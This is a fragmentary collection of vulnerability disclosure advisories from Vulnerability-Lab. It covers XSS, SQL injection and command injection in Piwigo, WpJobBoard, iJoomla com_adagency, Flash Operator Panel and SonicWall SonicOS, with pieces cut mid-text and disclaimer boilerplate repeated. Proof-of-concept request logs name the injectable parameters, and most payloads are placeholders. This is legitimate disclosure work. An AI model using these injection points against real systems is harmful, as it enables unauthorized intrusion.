individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Piwigo v2.8.2 & 2.9.2 CMS - Multiple Cross Site Vulnerabilities
EXECUTION!]>.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/x/public_html/x/piwigo/admin/languages.php on line 48 http://www.w3.org/TR/html4/strict.dtd;> Just another Piwigo gallery :: Piwigo Administration Vulnerable Source: to (form) <[MALICIOUS PAYLOAD EXECUTION!]> "> Update in progress... <<><[MALICIOUS PAYLOAD EXECUTION!]> "> Vulnerable Source: installstatus (error exception) Plugins list Check for updates Other plugins available An error occured during the files (<[MALICIOUS PAYLOAD EXECUTION!]>) extraction. Please check "plugins" folder and sub-folders permissions (CHMOD). Reference(s): http://piwigo.localhost:8080/ http://piwigo.localhost:8080/piwigo/ http://piwigo.localhost:8080/piwigo/admin.php Solution - Fix & Patch: === The xss web vulnerabilities can be patched by a secure restriction to the parameter inputs in GET method requests. Sanitize the vulnerable parameters and disallow the usage of special chars to prevent further script code injection attacks. Parse the output locations in the status messages or exception to resolve the client-side vulnerabilities. Escape the conetnts to deliver in a secure format. Security Risk: == The security risk of the client-side cross site scripting web vulnerabilities in the content management system are estimated as medium. (CVSS 3.4) Credits & Authors: == Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Flash Operator Panel v2.31.03 - Command Execution Vulnerability
and parameter in the index.php file GET method request. Sanitize the command path variable and disallow the usage of special chars to prevent further command injection attacks. Security Risk: == The security risk of the command injection vulnerability via path variable in the web-application is estimated as high (CVSS 6.2). Credits & Authors: == Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Wickr Inc - App Clock & Message Deletion Glitch - Bug Bounty
Wickr Inc - App Clock & Message Deletion Glitch P2 - Bug Bounty (Document) [PDF] URL: https://www.vulnerability-lab.com/get_content.php?id=2107 Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2018/01/04/wickr-inc-app-clock-message-deletion-glitch -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
WpJobBoard v4.4.4 - Multiple SQL Injection Vulnerabilities
the right syntax to use near ''' at line 1 - Fatal error: Uncaught exception 'wp_wpjb_job' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Reference(s): https://wp-jobboard.localhost:8080/ https://wp-jobboard.localhost:8080/wp-admin/ https://wp-jobboard.localhost:8080/wp-admin/admin.php https://wp-jobboard.localhost:8080/wp-admin/admin.php?page=wpjb-alerts=index=all= https://wp-jobboard.localhost:8080/wp-admin/admin.php?page=wpjb-job=index=1=job_expires_at= Solution - Fix & Patch: === The vulnerability can be patched by a restriction of the vulnerable sort and order parameters in the web-applicatoon GET method request. Disallow the usage of special chars to prevent malicious inputs and use a prepared statement to resolve the sql-injection vulnerability. Disallow to display errors by default configuration and include an exception-handling to cover further malicious attacks. Note: The sql-injections has been prevented in the version 4.9.1 up to the latest released version 5.1 of the wpjobboard wordpress web-application plugin. Security Risk: == The security risk of the remote sql-injection web vulnerabilities in the wpjobboard web-application is estimated as high (CVSS 6.0). Credits & Authors: ====== Vulnerability-Lab [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
SonicWall SonicOS NSA Web Firewall - Multiple Web Vulnerabilities
dapUsrGrpMbrAttr[member] ldapUsrGrpMbrType[0] ldapUsrGrpOtherMatchAttr[primaryGroupToken] cbox_ldapUsrUseOtherGrpAttr[] ldapUsrDomain[sjcolo.local] usrTreesSel[MALICIOUS PAYLOAD INJECT!] ldapTreesAutoConfDomain[] ldapAllowReferrals_0[on] ldapAllowReferrals_1[on] ldapAllowReferrals_2[on] ldapAllowReferrals_3[on] cbox_ldapAllowReferrals_0[] cbox_ldapAllowReferrals_1[] cbox_ldapAllowReferrals_2[] cbox_ldapAllowReferrals_3[] userRadiusCheckLocal[on] userRadiusUserGrpsLocal[on] selDfltUserGroup[2] ldapUsrGrpMirroring[on] ldapUsrGrpMirrorPeriod[x] ldapUsrGrpMirrorWhat[0] cbox_userRadiusCheckLocal[] cbox_userRadiusUserGrpsLocal[] cbox_ldapUsrGrpMirroring[] ldapRelayEnable[on] ldapRelayOnLAN[on] ldapRelayOnWAN[on] ldapRelayOnVPN[on] ldapRelaySecret[] ldapRelayLegacyVpnUsrGrp[] ldapRelayLegacyVpnClientGrp[] ldapRelayLegacyL2TPUsrGrp[] ldapRelayLegacyInetUsrGrp[] ldapRelayHashSecret[] cbox_ldapRelayEnable[] cbox_ldapRelayOnLAN[] cbox_ldapRelayOnWAN[] cbox_ldapRelayOnDMZ[] cbox_ldapRelayOnWLAN[] cbox_ldapRelayOnVPN[] Radius_user[] Radius_passwd[] remAuthTstProtocol[0] TestInfo[] remAuthTstType[-1] rNum[28F5903AD031CF055855192B2F30CC6E] testType[1] testDesc[LDAP+server] ldapUsrsTree_1[MALICIOUS PAYLOAD INJECT!] Response Header: Server[localhost] Expires[-1] Content-Type[text/html;charset=UTF-8] - Status: 200[OK] GET https://utm_waf.localhost:8512/x[MALICIOUS PAYLOAD EXECUTION!] Mime Type[unknown] Request Header: Host[utm_waf.localhost:8512] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://utm_waf.localhost:8512/ssoAuthProps.html] Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 777=0; 7510=0] --- PoC Session Logs [POST] --- Status: 200[OK] POST https://utm_waf.localhost:8512/main.cgi Mime Type[text/html] Request Header: Host[utm_waf.localhost:8512] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[https://utm_waf.localhost:8512/addServiceObjDlg.html] Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 777=2; 7510=0] Connection[keep-alive] POST-Daten: csrfToken[] svcObjId_-1[MALICIOUS INJECTED PAYLOAD!] svcObjType_-1[1] svcObjProperties_-1[4878] svcObjIpType_-1[ssh] svcObjPort1_-1[1] svcObjPort2_-1[1] svcObjManagement_-1[0] svcObjHigherPrecedence_-1[0] Response Header: Server[localhost] Content-Type[text/html;charset=UTF-8] - Status: 200[OK] GET https://utm_waf.localhost:8512/x[MALICIOUS PAYLOAD EXECUTION!] Mime Type[text/html] Request Header: Host[utm_waf.localhost:8512] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0] Referer[https://utm_waf.sonicwall:8512/ssoAuthProps.html] Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 777=3; 7510=0] Connection[keep-alive] Response Header: Server[SonicWALL] Content-Type[text/html;charset=UTF-8] Reference(s): https://utm_waf.sonicwall:8512/ https://utm_waf.localhost:8512/main.cgi https://utm_waf.localhost:8512/ldapProps.html https://utm_waf.sonicwall:8512/ssoAuthProps.html https://utm_waf.localhost:8512/addServiceObjDlg.html Solution - Fix & Patch: === The vulnerability can be patched by a parse and encode of the vulnerable `Host Name / IP Address`, `Client Name/IP Address` and `Proxy Forward To` input fields. Encode the following values `ldapServerBindName - usrTreesSel - ldapUsrsTree_1` and `svcObjId` to prevent an inject via POST method. Restrict the input fields and disallow the usage of special chars. Encode in the last step the output listing locations in the `SSO Agents `,`Terminal Services Agent Settings` and `RADIUS Accounting Single-Sign-On` modules to prevent the execution points of the vulnerabilities. Adjust the filter procedure and setup a more seure exception-handling to interact during an invalid execution or unhandled exception. Note: All the security issues are marked as resolved by dell sonicwall with several updates until 2017 Q4. Security Risk: == The security risk of the application-side input validation web vulnerability and the filter bypass issue are estimated as medium. (CVSS 4.5) Credits & Authors: ====== Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Be
iJoomla com_adagency 6.0.9 - SQL Injection Vulnerabilities
UTER JOIN #__users as user on user.id=advertis.user_id LEFT JOIN #__ad_agency_campaign as c on c.aid=advertis.aid WHERE 1=1 AND user.id<>'' AND advertis.approved LIKE '%-1'Y%' GROUP BY advertis.aid ORDER BY advertis.ordering ASC - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Y-1'' AND cb.`campaign_id`=3 GROUP BY b.id ORDE' at line 15 SQL=SELECT b . * , camp.id campaign_id, camp.name campaign_name, a.aid AS advertiser_id2, a.company AS advertiser, concat( width, 'x', height ) AS size_type, m.id mid, m.title zone_name FROM #__ad_agency_banners AS b LEFT OUTER JOIN #__ad_agency_advertis AS a ON b.advertiser_id = a.aid LEFT JOIN #__ad_agency_campaign_banner AS cb ON cb.banner_id = b.id LEFT JOIN #__ad_agency_campaign AS camp ON camp.id = cb.campaign_id LEFT JOIN #__ad_agency_order_type AS p ON camp.otid = p.tid LEFT JOIN #__modules AS m ON m.id = cb.zone WHERE 1=1 AND b.approved = 'Y-1'' AND cb.`campaign_id`=3 GROUP BY b.id ORDER BY b.ordering ASC , b.id DESC LIMIT 0,30 --- PoC Session Logs [GET] --- Status: 200[OK] GET http://joomla.localhost:8080/index.php?option=com_adagency=adagencyAds_select=Y-1%27[SQL-INJECTION VULNERABILITY!]**_id=3 Mime Type[text/html] Request Header: Host[joomla.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0] Cookie[dacce502d8fa40f12fdba764da41b8cf=8uusag3vgk0544u8phf9c4oa11; currentURI=http%3A%2F%2Fjoomla.localhost:8080%2F; em_cdn_uid=t%3D1471798050244%26u%3D11f009a55e864578928adec2c70fa876; 350a4e86045327a856d5c0333a428604=ukf6ldgrs5ekdrukh8p8s422k0; activeProfile=0] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[Apache] X-Powered-By[PHP/7.0.9] P3P[CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"] Connection[Keep-Alive] Transfer-Encoding[chunked] Content-Type[text/html; charset=UTF-8] - Status: 200[OK] GET http://joomla.localhost:8080/index.php?option=com_adagency=adagencyAdvertisers_status=-1%27Y[SQL-INJECTION VULNERABILITY!]** Mime Type[text/html] Request Header: Host[joomla.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Cookie[jsju=0; dacce502d8fa40f12fdba764da41b8cf=8uusag3vgk0544u8phf9c4oa11; currentURI=http%3A%2F%2Fjoomla.localhost:8080%2F; em_cdn_uid=t%3D1471798050244%26u%3D11f009a55e864578928adec2c70fa876; 350a4e86045327a856d5c0333a428604=ivi4d2j9782af9h0kntmqi6m43; activeProfile=0] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[Apache] X-Powered-By[PHP/7.0.9] P3P[CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"] Transfer-Encoding[chunked] Content-Type[text/html; charset=UTF-8] Reference(s): http://joomla.localhost:8080/ http://joomla.localhost:8080/index.php http://joomla.localhost:8080/index.php?option= http://joomla.localhost:8080/index.php?option=com_adagency http://joomla.localhost:8080/index.php?option=com_adagency http://joomla.localhost:8080/index.php?option=com_adagency=adagencyAdvertisers http://joomla.localhost:8080/index.php?option=com_adagency=adagencyAdvertisers_status http://joomla.localhost:8080/administrator/index.php?option=com_adagency=adagencyAdvertisers_status Solution - Fix & Patch: === The vulnerability can be patched by a secure parse and restriction of the vulnerable `advertiser_status` and `status_select` parameters in the com_adagency component. Disallow the usage of special chars, escape the entries and use a prepared statement to prevent exploitation of the vulnerabilities. Note: The vulnerability has been resolved in the last com_adagency component updates in 2017 Q1-4. Security Risk: == The security risk of the remote sql injection web vulnerabilities in the com_adagency 6.0.9 joomla component is estimated as high (CVSS 7.1). Credits & Authors: == Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or conseq
SonicWall SonicOS NSA UTM Firewall - Bypass & Persistent Vulnerability
22%26lt%3Bimg+src%3D%22x%22%26gt%3B%2520%2520%26gt%3B%22%26lt%3Biframe+src%3Da%26gt%3B%2520%26lt%3Biframe%26gt%3B] refresh_page[securityServicesCFView.html] tableIndex[-1] cgiaction[%5Bobject+Window%5D] --- PoC Session Logs (POST) [Inject] #2 --- Status: pending[] POST https://utm_waf.sonicwall.localhost:8351/main.cgi Mime Type[unknown] Request Header: Host[utm_waf.sonicwall.localhost:8351] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://utm_waf.sonicwall.localhost:8351/gavCloudExclusions.html] Cookie[curUrl=gavSummary.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0; 2039=local; 2040=%7B%22refreshTime%22%3A3%2C%22 showTimeRange%22%3A10%2C%22refreshEnable%22%3Atrue%2C %22viewApplications%22%3A1%2C%22viewBandwidth%22%3A1%2C%22viewPktRate%22%3A1%2C%22viewPktSize%22%3A1%2C%22 viewConnRate%22%3A1%2C%22viewConnCount%22%3A1%2C%22viewCoreMonitor%22%3A1%2C%22displayBandwidth%22%3A%22bwSelRate%22%2C %22displayPktRate%22%3A%22pktRateSelRate%22%2C%22displayPktSize%22%3A%22pktSizeSelRate%22%2C%22displayConnRate%22%3A%22 connRateSelRate%22%2C%22displayConnCount%22%3A%22connCountSelCount%22%2C%22ipVerBandwidth%22%3A%222%22%2C %22ipVerApps%22%3A%222%22%2C%22showMostFrequentApps%22%3Afalse%2C%22inChartAppLegends%22%3Afalse%2C%22hideAppLegends%22%3Atrue%2C%22inChartBwLegends %22%3Afalse%2C%22hideBwLegends%22%3Atrue%2C%22hidePktRateLegends%22%3Atrue%2C %22hidePktSizeLegends%22%3Atrue%2C%22hideConnRateLegends%22%3Atrue%2C%22hideConnCountLegends%22%3Atrue%2C%22hideAppChart%22%3Afalse%2C%22hideBwChart %22%3Afalse%2C%22hidePktRateChart%22%3Afalse%2C%22hidePktSizeChart%22%3Afalse%2C %22hideConnRateChart%22%3Afalse%2C%22hideConnCountChart%22%3Afalse%2C%22hideCoreMonChart%22%3Afalse%2C%22hideMemoryMonChart%22%3Afalse%2C%22rtAppColors %22%3A%5B%22%23081D58%22%2C%22%23253494%22%2C%22%23225EA8%22%2C%22%231D91C0%22%2C %22%2341B6C4%22%2C%22%237FCDBB%22%2C%22%23C7E9B4%22%2C%22%23EDF8B1%22%2C%22%23D9%22%5D%2C%22rtDataColors %22%3A%5B%22%23E41A1C%22%2C%22%23377EB8%22%2C%22%234DAF4A%22%2C%22%23984EA3%22%2C%22%23FF7F00%22%2C%22%2333%22%2C %22%23A65628%22%2C%22%23F781BF%22%2C%22%2399%22%2C%22%235A6B34%22%2C%22%23F0D64E%22%2C%22%23D7B740%22%2C%22%23AB80 24%22%2C%22%23925818%22%2C%22%23DB5A6E%22%2C%22%23071D69%22%2C%22%230A1650%22%2C%22%234571DA%22%2C%22%23E18B5C%22%2C %22%23028482%22%2C%22%237ABA7A%22%2C%22%23B76EB8%22%5D%2C%22useGradient%22%3Atrue%7D] POST-Daten: csrfToken[???] inputbox[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E] list[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E] gav_cloud_exclude_list[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E] gav_cloud_refresh_exclusions[] refresh_page[gav_cloud.html] isobject[1] cgiaction[%5Bobject+Window%5D] Reference(s): https://utm_waf.sonicwall.localhost:8351/main.cgi https://utm_waf.sonicwall.localhost:8351/gavCloudExclusions.html https://utm_waf.sonicwall.localhost:8351/addTrustedDomainDlg.html Solution - Fix & Patch: === The vulnerability can be patched by setting up a secure validation for the update inputbox save procedure. Use the same as on the add procedure. Encode the context and disallow usage of special chars in the item list when processing to add. Parse the context and filter the input next to the permanent save that finally displays the context in the main item list to prevent an application-side script code execution. Note: The vulnerabilities has been reported to the dell security team. The issue has been resolved to 2016Q4 - 2017Q4 by the sonicwall developers. Security Risk: == The security risk of the application-side input validation web vulnerability and the filter bypass issue are estimated as medium (CVSS 4.5). Credits & Authors: == Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not a